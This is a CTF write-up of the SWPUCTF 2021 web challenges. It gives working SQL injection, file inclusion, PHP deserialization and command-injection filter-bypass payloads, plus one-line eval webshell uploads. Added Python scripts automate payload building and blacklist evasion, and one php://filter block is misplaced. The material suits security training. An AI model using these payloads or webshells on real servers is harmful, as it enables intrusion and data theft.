SWPUCTF 2021 Freshman Contest - WEB writeups

Contents

gift_F12

jicao

easy_md5

easy_sql

include

easyrce

Do_you_know_http

ez_unserialize

easyupload1.0

easyupload2.0

easyupload3.0

no_wakeup

PseudoProtocols

error

hardrce

pop

sql

finalrce

hardrce_3


gift_F12

Just view the page source (F12); the flag is there.

jicao

Source:

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

The json check is a PHP loose-comparison (type-juggling) bypass.

With ==, PHP converts both sides to a common type before comparing. json_decode() keeps the JSON integer 0 as a PHP int, and on PHP 7 comparing an int with a non-numeric string casts the string to 0, so 0=="wllm" is true. (On PHP 8 that comparison is false; there you would send {"x":"wllm"}, which works on every version anyway, since the juggling here only stands in for the expected value.)

payload:

GET:
?json={"x":0}
POST:
id=wllmNB

easy_md5

Source:

<?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?> 

MD5 loose comparison.

md5($name) == md5($password) compares the two hex digests with ==. If both digests have the form 0e followed only by digits, PHP treats them as numeric strings (0 times 10^N), so both evaluate to 0 and compare equal even though the digests, and the inputs, differ. 240610708 and QLTHNDT are the well-known "magic hash" inputs: their md5s are 0e462097431906509019562988736854 and 0e405967825401955372549139051580. The $name != $password check is loose too, but a numeric string and a non-numeric one are compared byte for byte, so it passes.

payload:

GET:
?name=240610708

POST:
password=QLTHNDT
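As an added example (not code from the original writeup), the Python below shows why that pair works: it checks whether an input's md5 is a magic hash, emulates PHP's loose == on two strings, and brute-forces a small integer range the way the classic value 240610708 was originally found. The emulation is a simplification assumed for this example: it covers only the numeric-string case the challenge relies on.

```python
import hashlib
import re

# A "magic hash" is an md5 hex digest of the form 0e<digits only>. PHP's == sees
# such a string as numeric (scientific notation: 0 * 10^N), i.e. as the number 0.
MAGIC_RE = re.compile(r"^0e[0-9]+$")
# PHP's notion of a numeric string (simplified: sign, digits, optional fraction/exponent)
NUMERIC_RE = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def is_magic_md5(s: str) -> bool:
    """True if md5(s) is 0e followed only by digits."""
    return MAGIC_RE.match(hashlib.md5(s.encode()).hexdigest()) is not None


def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings (simplification, assumed for this example):
    two numeric strings are compared as doubles, anything else byte for byte."""
    if NUMERIC_RE.match(a) and NUMERIC_RE.match(b):
        return float(a) == float(b)   # "0e462..." and "0e405..." both parse as 0.0
    return a == b


def passes_check(name: str, password: str) -> bool:
    """The challenge condition: $name != $password && md5($name) == md5($password)."""
    h_name = hashlib.md5(name.encode()).hexdigest()
    h_pass = hashlib.md5(password.encode()).hexdigest()
    return not php_loose_eq(name, password) and php_loose_eq(h_name, h_pass)


def search_magic_md5(start: int, stop: int):
    """Brute-force decimal integers in [start, stop) and return the first whose md5
    is a magic hash (None if there is none). Run from 0 this finds 240610708 after
    about 2.4e8 hashes, which is how the classic value was originally found."""
    for n in range(start, stop):
        s = str(n)
        if is_magic_md5(s):
            return s
    return None


if __name__ == "__main__":
    for s in ("240610708", "QLTHNDT", "QNKCDZO"):
        print(s, hashlib.md5(s.encode()).hexdigest(), is_magic_md5(s))
    print("passes:", passes_check("240610708", "QLTHNDT"))
```

Any two magic-hash inputs work as the pair; the search function only has to be run once, which is why everyone reuses the same few values.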

easy_sql

Jie-ge has gone completely mad!!! (meme)

Look at the page source first.

The <title> looks off: it gives away the injectable parameter, wllm.

Find the number of columns (order by 3 works, order by 4 errors, so there are 3):

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

Find which columns are echoed:

?wllm=-1' union select 1,2,3--+

Database name:

?wllm=-1' union select 1,2,database()--+

Table names:

?wllm=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'test_db' ),3 --+

Column names of that table:

?wllm=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'test_db' and table_name='test_tb' ),3 --+

Flag:

?wllm=-1' union select 1,(select group_concat(concat_ws(0x7e,flag))from test_tb),3 --+

include

Just pass a file name in.

File inclusion: the file parameter goes into include(), so rather than executing flag.php, read it through the php://filter wrapper, which base64-encodes the file before it is included and therefore prints its source instead of running it.

payload:

?file=php://filter/convert.base64-encode/resource=flag.php

Base64-decode the output to get the flag.

easyrce

A quick try: the url parameter is evaluated as PHP, so any expression runs directly.

?url=system('ls /');

?url=system('cat /f*');

Do_you_know_http

A bit puzzling at first; capture the request with a proxy and try the headers.

Set User-Agent to WLLM and the response gives the path a.php; open it.

That page checks the client address via X-Forwarded-For; setting X-Forwarded-For: 127.0.0.1 is enough.

ez_unserialize

Whoa, Genshin again (too bad I already have Hu Tao).

Source:

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?> 

payload:

<?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }
}
$a=new wllm();
$b=serialize($a);
echo $b;
?> 
?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";} 

easyupload1.0

Capture the upload request with a proxy.

Change the Content-Type to an image MIME type (the check only looks at the declared type).

Connect with AntSword (蚁剑).

The answer that turns up through AntSword is off.

So POST to the shell directly and read phpinfo() to find the real flag.

easyupload2.0

Upload a one-line webshell.

Change the Content-Type and rename the .php extension to .phtml: the extension check misses it but Apache still hands the file to PHP.

Connect with AntSword (don't forget the file is under the upload directory).

Got the flag.

easyupload3.0

First upload a .htaccess that tells Apache to run every file whose name matches "jpg" through the PHP handler (this only works when Apache honours per-directory .htaccess files and runs PHP as mod_php):

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

Change the Content-Type to an image type in the proxy.

Then rename the one-line webshell to .jpg and upload it; the GIF89a header makes it look like a real GIF to a content check:

a.jpg

GIF89a
<?=eval($_POST['1']);?>

POST 1=phpinfo(); to the uploaded file.

Got the flag.

no_wakeup

Whoa, Genshin again.

Same approach as ez_unserialize above, except __wakeup() has to be bypassed this time.

Declare more properties in the serialized string than the object actually has (any count larger than the real one): PHP before 5.6.25 / 7.0.10 then skips __wakeup() (CVE-2016-7124), and __destruct() still runs with the properties we set.

payload:

<?php
class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="admin";
            $this->passwd ="wllm";
        }
}
$a=new HaHaHa();
$b=serialize($a);
$b = str_replace(':2:', ':3:',$b); 
echo $b;  
?>

?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";} 

PseudoProtocols

File inclusion again. Read the source first with php://filter and base64-decode it, as in include.

The included file's content has to equal the string I want flag, so supply that content inline through the data:// wrapper instead of a file on disk (include() accepts data:// only when allow_url_include=On, which this target has):

payload:

?a=data://text/plain;base64,SSB3YW50IGZsYWc=
SSB3YW50IGZsYWc= is the base64 of I want flag

error

Error-based injection with updatexml(). Database name:

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

Tables:

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='test_db'),0x7e),1) #

Column (the flag). The XPATH error shows at most 32 characters, one of which is the leading ~, so the flag has to be read in pieces with substr():

1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),1,31),0x7e),1)--+
1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),20,50),0x7e),1)--+

Oddly the error text is only visible in the raw response (capture it with a proxy rather than reading the rendered page). The two pieces overlap, so line them up and join them to get the flag.
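Added example, not part of the original writeup: a Python helper that computes the non-overlapping 31-character windows, parses the leaked fragment out of MySQL's XPATH error text, and walks the whole value. The oracle it runs against is a constructed stand-in with a made-up flag so that it runs offline; against the real target it would be an HTTP request returning the raw response.

```python
import re

# updatexml() reports at most 32 characters of the bad XPath value. With
# concat(0x7e, X, 0x7e) the first character is the '~', so each query leaks
# 31 characters of X.
WIDTH = 31
LEAK_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def payload(expr: str, offset: int, width: int = WIDTH) -> str:
    """Error-based probe for substr(expr, offset, width), same shape as the page's."""
    return (f"1' and updatexml(1,concat(0x7e,substr(({expr}),{offset},{width}),"
            f"0x7e),1) #")


def parse_leak(response: str):
    """Pull the leaked fragment out of MySQL's XPATH error text; None if there is none.
    The closing ~ only survives when the fragment is shorter than the window."""
    m = LEAK_RE.search(response)
    if m is None:
        return None
    return m.group(1).rstrip("~")


def extract(oracle, expr: str, width: int = WIDTH) -> str:
    """Read expr in consecutive non-overlapping windows until a short one comes back."""
    out, offset = "", 1
    while True:
        frag = parse_leak(oracle(payload(expr, offset, width)))
        if not frag:
            return out
        out += frag
        if len(frag) < width:
            return out
        offset += width


# Constructed stand-in for the vulnerable page (not a real target): it evaluates
# the substr() in the injected payload against a made-up flag and returns the
# error message MySQL would produce.
FAKE_FLAG = "NSSCTF{this_is_a_constructed_flag_for_the_example_0123}"


def fake_oracle(p: str) -> str:
    m = re.search(r"substr\(\(select flag from test_tb\),(\d+),(\d+)\)", p)
    off, n = int(m.group(1)), int(m.group(2))
    piece = FAKE_FLAG[off - 1: off - 1 + n]
    shown = ("~" + piece + "~")[:32]          # MySQL truncates the value to 32 chars
    return f"ERROR 1105 (HY000): XPATH syntax error: '{shown}'"


if __name__ == "__main__":
    print(extract(fake_oracle, "select flag from test_tb"))
```

Windows of 31 at offsets 1, 32, 63, ... never overlap, so no manual alignment is needed. The parser strips a trailing ~ to drop the closing delimiter, which would also eat a ~ that is genuinely the last character of the data; a flag ending in ~ would need a different delimiter.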

hardrce

Bitwise-NOT bypass: NOT the command text first, URL-encode the resulting bytes, and have PHP apply ~ again at runtime so the original text comes back.

This gets past a preg_match() blacklist of letters and digits, because the NOT of any printable ASCII byte has the high bit set and so is never alphanumeric.

Script to NOT a string:

<?php
echo urlencode(~'text to negate');
?>

Put the results into the parameter as

(~result1)(~result2);

PHP evaluates (~"...")(~"...") as a variable function call: the first NOT yields the function name, the second its argument.

The regex in this challenge filters all letters and some symbols, but ~ is not filtered, so the NOT trick lets us look at the file system. First list the root directory with system("ls /").

NOT system and (ls /) separately (the parentheses are part of the negated argument, so the shell runs (ls /) as a subshell, which produces the same listing):

payload:

?wllm=(~%8C%86%8C%8B%9A%92)(~%D7%93%8C%DF%D0%D6);

system and (cat /flllllaaaaaaggggggg)

payload:

?wllm=(~%8C%86%8C%8B%9A%92)(~%D7%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98%D6);
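Added example (not the original author's script): the Python equivalent of the PHP negation script above, a check that the decoded payload contains no alphanumerics, and a helper that un-NOTs the payload to show what PHP actually evaluates. The challenge's exact blacklist regex is not on the page, so the check assumes [a-zA-Z0-9].

```python
import re
from urllib.parse import unquote_to_bytes


def neg_encode(s: str) -> str:
    """URL-encoded bitwise NOT of each byte of s: what PHP's urlencode(~'s') prints."""
    return "".join("%%%02X" % ((~b) & 0xFF) for b in s.encode("latin-1"))


def neg_payload(func: str, arg: str) -> str:
    """(~func)(~arg); PHP un-NOTs both strings at runtime and calls func(arg)."""
    return f"(~{neg_encode(func)})(~{neg_encode(arg)});"


def survives_filter(p: str, pattern: str = r"[a-zA-Z0-9]") -> bool:
    """Run the decoded payload through a preg_match-style blacklist. The challenge's
    exact regex is not on the page; an alphanumeric blacklist is assumed here."""
    return re.search(pattern.encode(), unquote_to_bytes(p)) is None


def php_eval_view(p: str) -> str:
    """Undo the ~ on every %XX run to show the code PHP ends up evaluating."""
    def undo(m):
        raw = unquote_to_bytes(m.group(1))
        return '"' + bytes((~b) & 0xFF for b in raw).decode("latin-1") + '"'
    return re.sub(r"~((?:%[0-9A-Fa-f]{2})+)", undo, p)


if __name__ == "__main__":
    for arg in ("(ls /)", "cat /flllllaaaaaaggggggg"):
        p = neg_payload("system", arg)
        print(p, survives_filter(p), php_eval_view(p))
```

The bytes have to stay URL-encoded in the query string; once decoded they are not valid UTF-8, which is exactly why no letter-based filter sees them.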

pop

Deserialization: a POP chain.

Source:

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

 payload:

<?php
 
class w44m{
 
    private $admin = 'w44m';
    protected $passwd = '08067';
 
}
 
class w22m{
    public $w00m;
}
 
class w33m{
    public $w00m;
    public $w22m;
 
}
# chain: w22m::__destruct() echoes $w00m -> w33m::__toString() calls $this->w00m->{$this->w22m}() -> w44m::Getflag()
$a = new w22m();
$b = new w33m();
$c = new w44m();
# entry point: the object that gets unserialized
$a->w00m=$b;
# the chain
$b->w00m=$c;
$b->w22m='Getflag';
echo urlencode(serialize($a)); # URL-encode because private/protected property names are mangled with NUL bytes
?>
 
?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D 
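Added example for the three deserialization challenges above (ez_unserialize, no_wakeup and this pop chain); it is not code from the original writeup. It is a small re-implementation of PHP's serialize() in Python that handles the NUL-byte name mangling of private and protected properties and lets the declared property count be faked for the __wakeup() bypass, so all three payloads can be generated without a PHP interpreter.

```python
from urllib.parse import quote


class PhpObject:
    """Minimal model of a PHP object for building serialize() output by hand.
    props: list of (name, visibility, value), visibility in public|protected|private."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def _mangle(cls, name, vis):
    # PHP stores non-public property names with NUL-byte markers, which is why
    # the payload has to be URL-encoded before it goes into a query string.
    if vis == "protected":
        return "\0*\0" + name
    if vis == "private":
        return "\0" + cls + "\0" + name
    return name


def php_serialize(v, fake_count=None):
    """serialize() for None, bool, int, str and PhpObject. fake_count overrides the
    declared property count of the outermost object (the __wakeup() bypass)."""
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return "b:%d;" % v
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v.encode()), v)   # length counts bytes, NULs included
    if isinstance(v, PhpObject):
        n = len(v.props) if fake_count is None else fake_count
        body = "".join(php_serialize(_mangle(v.cls, name, vis)) + php_serialize(val)
                       for name, vis, val in v.props)
        return 'O:%d:"%s":%d:{%s}' % (len(v.cls), v.cls, n, body)
    raise TypeError(type(v))


def ez_unserialize_payload():
    return php_serialize(PhpObject("wllm", [("admin", "public", "admin"),
                                            ("passwd", "public", "ctf")]))


def no_wakeup_payload():
    # declare 3 properties while only 2 are present: PHP < 5.6.25 / 7.0.10 then
    # skips __wakeup() (CVE-2016-7124)
    return php_serialize(PhpObject("HaHaHa", [("admin", "public", "admin"),
                                              ("passwd", "public", "wllm")]), fake_count=3)


def pop_payload():
    # w22m::__destruct echoes w33m -> __toString -> $this->w00m->{$this->w22m}() -> w44m::Getflag
    w44m = PhpObject("w44m", [("admin", "private", "w44m"), ("passwd", "protected", "08067")])
    w33m = PhpObject("w33m", [("w00m", "public", w44m), ("w22m", "public", "Getflag")])
    w22m = PhpObject("w22m", [("w00m", "public", w33m)])
    return php_serialize(w22m)


def pop_payload_urlencoded():
    return quote(pop_payload(), safe="")


if __name__ == "__main__":
    print(ez_unserialize_payload())
    print(no_wakeup_payload())
    print(pop_payload_urlencoded())
```

Property order follows the order in the props list, which matters for the pop chain only in that it must match the class declaration for readability; PHP unserialize() does not care about order.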

sql

Looks like easy_sql above.

Try the same thing first.

Well, it's not the same; no shortcuts, start over.

This part follows [SWPUCTF 2021 新生赛]sql_ha0cker的博客-CSDN博客

because I was completely out of ideas.

Filtered:

update
AND
DELETE
UPDATE
insert
updatexml
length 
delete
right
extractvalue
REVERSE
sys schemma
+
=
--+
left
handler
substring
rand()
LEFT
anandd
OUTFILE
INTO
'1'='1'

Testing shows that = and the space character are filtered too.

Hence the payloads:

Column count (use %23 for #, since a bare # would end the URL, and /**/ for spaces):

?wllm=-1'/**/order/**/by/**/4%23

Database:

?wllm=-1'/**/union/**/select/**/1,database(),3%23

Tables (use like instead of =):

?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'),3%23

Columns:

?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'),3%23

Flag:

?wllm=-1'/**/union/**/select/**/1,(select/**/group_concat(concat_ws(0x7e,flag))from/**/LTLT_flag),3%23

The output length of the field is limited, so the string has to be sliced.

left, right, substr and reverse are filtered, but mid() is not:

?wllm=-1'/**/union/**/select/**/1,mid(flag,10,40),3/**/from/**/LTLT_flag%23

?wllm=-1'/**/union/**/select/**/1,mid(flag,25,50),3/**/from/**/LTLT_flag%23

Join the pieces to get the flag.
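Added example, not from the original writeup: Python that mirrors the blacklist above, rewrites a plain union payload into the comment-for-space, like-for-=, mid-for-substr form, and confirms nothing blacklisted survives. The checker assumes case-insensitive substring matching (the mixed-case entries in the list suggest that) and that the space and = found by testing belong to the same list.

```python
import re

# Blacklist as listed above, plus the space and '=' found by testing. Matching is
# assumed to be case-insensitive substring search.
BLACKLIST = ["update", "and", "delete", "insert", "updatexml", "length", "right",
             "extractvalue", "reverse", "sys schemma", "+", "=", "--+", "left",
             "handler", "substring", "rand()", "outfile", "into", "'1'='1'", " "]


def blocked(value: str):
    """First blacklisted token found in the injected value, or None if it is clean."""
    low = value.lower()
    for tok in BLACKLIST:
        if tok in low:
            return tok
    return None


def rewrite(value: str) -> str:
    """Turn a plain union/order-by injection into the filtered form used above:
    substr()/substring() -> mid(), '=' -> like, whitespace -> /**/, '#' -> %23."""
    v = re.sub(r"\bsubstr(?:ing)?\(", "mid(", value, flags=re.I)
    v = re.sub(r"\s*=\s*", " like ", v)
    v = re.sub(r"\s+", "/**/", v.strip())
    return v.replace("#", "%23")


def query(value: str) -> str:
    """Full query string for the wllm parameter (the '=' here is the URL's, not SQL's)."""
    return "?wllm=" + rewrite(value)


if __name__ == "__main__":
    for v in ("-1' order by 4#",
              "-1' union select 1,(select group_concat(table_name) from "
              "information_schema.tables where table_schema = 'test_db'),3#",
              "-1' union select 1,substr(flag,10,40),3 from LTLT_flag#"):
        print(query(v), blocked(rewrite(v)))
```

Because "and" is matched as a substring, any column or table name containing it (handler, rand) would trip the filter too, which is why blocked() is run on the rewritten value before it is sent.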

finalrce

Source:

 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

A whole pile of things is filtered, and exec() discards the command's output, so nothing comes back in the page by itself.

Out of ideas, I looked at other people's writeups.

The trick is the Linux tee command: write the command's output into a file under the web root and fetch that file afterwards. Since ls matches the regex, preg_match also has to be bypassed: a backslash inside the word (l\s) is removed by the shell, so the shell still runs ls while the regex never sees the substring "ls".

?url=l\s / | tee 1.txt

The tee command
Only the usage needed for this challenge is described here.

tee reads from standard input and writes to both standard output and the given file(s).

Usage: tee [OPTION]... [FILE]...

Then visit /1.txt to see the listing, and read the flag the same way. cat, more and less are blocked but tac is not, and the "la" in the filename is hidden with the same backslash trick:

?url=tac /flllll\aaaaaaggggggg | tee 2.txt

Fetch /2.txt for the flag.
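Added example (not the original author's): Python that applies the backslash trick automatically against the exact regex from the source above, refuses when the match is a single banned character that a backslash cannot hide, and shows the argv the shell ends up running.

```python
import re
import shlex

# The exact regex from the source above (case-insensitive, as its /i flag says).
FILTER = re.compile(
    r'bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$',
    re.I)


def evade(cmd: str):
    """Insert a backslash after the first character of every blacklisted word so that
    preg_match() no longer finds it; sh drops an unquoted backslash before an
    ordinary character, so the command it runs is unchanged. Returns None when the
    match is a single banned character (- * " > < % $) that a backslash cannot hide."""
    out = cmd
    while True:
        m = FILTER.search(out)
        if m is None:
            return out
        if len(m.group(0)) < 2:
            return None
        out = out[:m.start() + 1] + "\\" + out[m.start() + 1:]


def shell_argv(cmd: str):
    """What the shell makes of the command after quote and backslash removal."""
    return shlex.split(cmd)


if __name__ == "__main__":
    for cmd in ("ls / | tee 1.txt", "tac /flllllaaaaaaggggggg | tee 2.txt", "cat /flag"):
        e = evade(cmd)
        print(e, shell_argv(e))
```

Running it on the two commands used above reproduces l\s and flllll\aaaaaaggggggg; the "la" hidden inside the flag file name is caught by the same loop, which is easy to miss by hand. Anything needing $, > or - has no backslash escape and needs a different approach (the page uses tee precisely because > is banned).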

(Equivalent forms of the php://filter read used in the include challenge above; the second spells out the read= filter chain. Both return the target file base64-encoded.)

?file=php://filter/convert.base64-encode/resource=flag.php

payload:

?file=php://filter/read=convert.base64-encode/resource=flag

Base64-decode the result.

hardrce_3

Source:

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");
    }}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{
    die("Ra'sAlGhul说用字母数字是没有灵魂的!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>

Compared with hardrce above, this one bans ~, |, ^ and the space character as well as letters and digits.

So this one uses the self-increment trick from the other writeups: $_=[] makes an array, "$_" stringifies it to "Array", ['!'=='@'] indexes it with false (i.e. 0) to get "A", and ++ on a one-letter PHP string walks the alphabet, so every capital letter can be built from that "A". The template spells ASSERT into $___ and _POST into $____, then runs $_=$$____;$___($_[_]); which is assert($_POST[_]).

So this is the fixed template that produces assert($_POST[_]); and the PHP to run goes in the POST body as _=phpinfo();

The payload has to be URL-encoded when it is sent:
%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B'!'%3D%3D'%40'%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D'_'%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B
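Added example, not from the original writeup: a Python generator for the increment payload, so the template above can be rebuilt for any upper-case function and variable name, with a check against the hardrce_3 filters. It spells every letter separately instead of reusing the "S" register the way the template above does, so its output is longer but equivalent. It assumes PHP 7, where assert() still evaluates a string argument and a bare _ is read as the string "_" (PHP 8 does neither).

```python
import re


def php_inc_letter(c: str, n: int) -> str:
    """PHP's ++ on a one-letter string walks the alphabet ('A'++ is 'B'). Only the
    single upper-case letter case is modelled, which is all the payload needs."""
    assert len(c) == 1 and "A" <= c <= "Z" and ord(c) + n <= ord("Z")
    return chr(ord(c) + n)


def build_increment_payload(func: str = "ASSERT", var: str = "_POST") -> str:
    """Letter- and digit-free PHP that calls func($var[_]).
    $_=[] makes an array, "$_" stringifies it to "Array", ['!'=='@'] indexes it
    with false (0) to get "A"; every other capital letter is reached by ++ from
    that "A". func and var may contain only A-Z and _."""
    p = "$_=[];$_=@\"$_\";$_=$_['!'=='@'];"        # $_ = "A"

    def spell(dst: str, word: str) -> str:
        s = f"{dst}='';"
        for ch in word:
            if ch == "_":
                s += f"{dst}.='_';"                   # '_' is allowed literally
                continue
            n = ord(ch) - ord("A")
            if not 0 <= n < 26:
                raise ValueError("only A-Z and _ can be spelled")
            s += "$__=$_;" + "$__++;" * n + f"{dst}.=$__;"   # $__ = "A", ++ n times
        return s

    p += spell("$___", func)       # $___ = "ASSERT" (PHP function names are case-insensitive)
    p += spell("$____", var)       # $____ = "_POST"
    p += "$_=$$____;"              # $_ = $_POST (variable variable)
    p += "$___($_[_]);"            # ASSERT($_POST[_]); bare _ is the string "_" on PHP 7
    return p


HARDRCE3_BLACKLIST = [" ", "^", "~", "|"]


def passes_hardrce3(p: str) -> bool:
    """The two checks from the source above: no space/^/~/| and no letter or digit."""
    return (not any(b in p for b in HARDRCE3_BLACKLIST)
            and re.search(r"[a-zA-Z0-9]", p) is None)


if __name__ == "__main__":
    p = build_increment_payload()
    print(len(p), passes_hardrce3(p))
    print(p)
```

Send the result URL-encoded in wllm and the code in the POST body under _, exactly as with the template above; the two payloads differ only in how the letters are accumulated.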

No flag in phpinfo.

It does show that system, exec, shell_exec, popen, proc_open and passthru are in disable_functions.

But file_put_contents(,) is still available.

file_put_contents() takes the file name as its first argument and the content as its second.

So build:

 _=file_put_contents("1.php","<?php eval(\$_POST['1']); ?>");

which writes a one-line webshell (the \ before $ keeps PHP from interpolating $_POST inside the double-quoted string when assert evaluates it).

Then open /1.php and connect with AntSword using password 1.
